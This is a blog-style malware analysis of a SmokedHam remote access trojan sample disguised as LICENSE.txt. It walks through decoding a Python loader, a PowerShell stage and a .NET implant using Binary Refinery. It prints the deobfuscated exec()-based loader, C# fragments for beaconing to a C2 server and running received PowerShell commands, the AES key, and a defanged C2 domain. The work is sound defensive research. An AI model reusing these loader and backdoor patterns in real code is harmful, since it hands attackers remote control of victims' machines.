Skip to main content
  1. Posts/

SmokedHam - Malware Analysis

·691 words·4 mins·
oxygen
Author
oxygen
Table of Contents

This write-up documents the analysis of a Smokedham RAT sample shared by struppigel on SamplePedia.

The primary goal of this analysis is learning and demonstrating how to leverage Binary Refinery pipelines to recover an embedded, multi-stage .NET payload from a Python byte-compiled loader. This is a learning-focused analysis intended for documentation and knowledge sharing rather than a full threat-intel report.

The sample implements a multi-stage, fileless-capable Remote Access Trojan (RAT) consisting of:

  • Stage 1: Python byte-compiled loader (.pyc)
  • Stage 2: Python → CLR → embedded PowerShell loader
  • Stage 3: In-memory C# (.NET) backdoor

The final implant provides an interactive PowerShell-based backdoor with encrypted command-and-control (C2), hosted on Cloudflare Workers.

Basic File Information
#

FieldValue
FilenameLICENSE.txt
SHA-256361f20f5843a9d609d42fc17f164eb44ed4f86ae3062e66e978c2c93890f65fd
File TypePython byte-compiled
Original Nameza131_obf_fun_app.py
File Size (bytes)115,760
Compile Time2025-12-30 07:23:52 UTC
Python Version3.12

Public Intel & Pivots
#

SourceReference
VirusTotalhttps://www.virustotal.com/gui/file/361f20f5843a9d609d42fc17f164eb44ed4f86ae3062e66e978c2c93890f65fd
VT Detection Ratio6 / 62
VT First Submitted:2026-01-15 18:52:00 UTC
Malpediahttps://malpedia.caad.fkie.fraunhofer.de/details/win.smokedham
Sample Sourcehttps://malshare.com/sample.php?action=detail&hash=361f20f5843a9d609d42fc17f164eb44ed4f86ae3062e66e978c2c93890f65fd

Code Analysis
#

Stage 1 – Python Bytecode Loader
#

The initial file is a Python byte-compiled payload (.pyc). Since Python 3.12 is currently unsupported by common decompilers such as uncompyle6, I will be using PyLingual to decompile it.

Deobfuscated Logic
#

import base64
import zlib

data_blob = "<hex string>"
xorkey = 23

hex_blob = bytes.fromhex(data_blob)
xor_blob = bytes((b ^ xorkey for b in hex_blob))[::-1]
payload = zlib.decompress(base64.b64decode(xor_blob))

exec(payload.decode("utf-8"))

The loader:

  1. Decodes a hex-encoded blob
  2. XOR-decrypts it using a static key
  3. Reverses the byte order
  4. Base64-decodes and zlib-decompresses the result
  5. Executes the recovered Python source in memory

Stage 2 – Python → PowerShell Loader
#

Binary Refinery Pipeline (Stage 2)
#

ef 361f20f5843a9d609d42fc17f164eb44ed4f86ae3062e66e978c2c93890f65fd | carve -s string | hex | xor 23 | rev | b64 | zl | dump stage2.py

This pipeline mirrors the Stage 1 deobfuscation logic.

Since the payload of Stage 1 is a large hex blob, we can extract the large hex blob by using carve -s, which will only get the biggest match. Then we can apply the BinRef units as observed from the Stage 1 functions to further reveal the Stage 2.

Behavior Summary
#

Stage 2 embeds the PowerShell engine directly inside the Python process using pythonnet (clr). No powershell.exe process is spawned.

Key behaviors:

  • Delays execution for 60 seconds (sandbox evasion)
  • Uses ConvertTo-SecureString -Key to AES-decrypt an embedded Base64 blob
  • Compiles C# source code entirely in memory using Add-Type
  • Executes a static method from the compiled assembly
  • Passes a C2 URL, encryption key, and beacon interval to the implant

The resulting .NET payload never touches disk.

Stage 3 – Final .NET Implant
#

Binary Refinery Pipeline (Stage 3)
#

ef stage2 | carve -s string | secstr hex:131d7b8d62eacefd4b8a21ce3f1fa672721d0dcafebcf1320f93c1919ce570e3 | dump payload.malz

The secstr unit implements the AES-based encryption used by ConvertTo-SecureString when invoked with the -Key parameter. Since the Stage 2 employs the ConvertTo-SecureString, I will replicate it to avoid any conflict. The AES key is reconstructed by converting the byte array used in Stage 2 into its hexadecimal representation.

Final Payload Capabilities
#

The recovered Stage 3 payload is an in-memory .NET remote access trojan with the following features:

  • Hidden console window
  • Host registration (hostname, user, OS)
  • Periodic beaconing to C2
  • Encrypted tasking and output (RC4-like stream cipher)
  • PowerShell command execution via runspaces
  • Randomized URL paths per request
  • No persistence or dropped files

C2 Communication Example
#

HttpWebRequest req = (HttpWebRequest)WebRequest.Create(
    $"{C2Url}/{GenerateRandomString(0)}/"
);
req.Method = "POST";
req.ContentType = "application/json";
req.UserAgent = UserAgent;

Command Execution
#

using (Runspace runspace = RunspaceFactory.CreateRunspace())
{
    runspace.Open();
    Pipeline pipeline = runspace.CreatePipeline();
    pipeline.Commands.AddScript(command);
    pipeline.Commands.Add("Out-String");
    pipeline.Invoke();
}

Full Binary Refinery Pipeline
#

The .NET payload can be extracted using the Binary Refinery chain as below:

ef 361f20f5843a9d609d42fc17f164eb44ed4f86ae3062e66e978c2c93890f65fd | pyc | carve -s string | hex | xor 23 | rev | b64 | zl | carve -s string  | secstr hex:131d7b8d62eacefd4b8a21ce3f1fa672721d0dcafebcf1320f93c1919ce570e3 | dump payload.malz

Analysis Summary
#

File Name:LICENSE.txt
SHA-256 Hash:361f20f5843a9d609d42fc17f164eb44ed4f86ae3062e66e978c2c93890f65fd
File Size (bytes):115760
Compile Time:2025-12-30 07:23:52 UTC
VT First Seen:2026-01-15 18:52:00 UTC
File Type/Packed?:Python byte-compiled
Classification:Trojan/Backdoor
Malware Family:Smokedham
Key Functionality:Remote Access Trojan
Network Artifacts/Infrastructure:webapp.scan-engine-a2d.workers[.]dev

Reference
#

Related

Lobster Stealer - Malware Analysis
·1256 words·6 mins
The writeup analyzes Lobster Stealer, a macOS malware that steals sensitive data like passwords, browser history, and cryptocurrency wallet info. It uses RC4 for command obfuscation and AES-128-CBC for encrypting flag. The challenge involves decrypting the flag by analyzing the malicious OSA script and extracting encryption keys from a PNG file.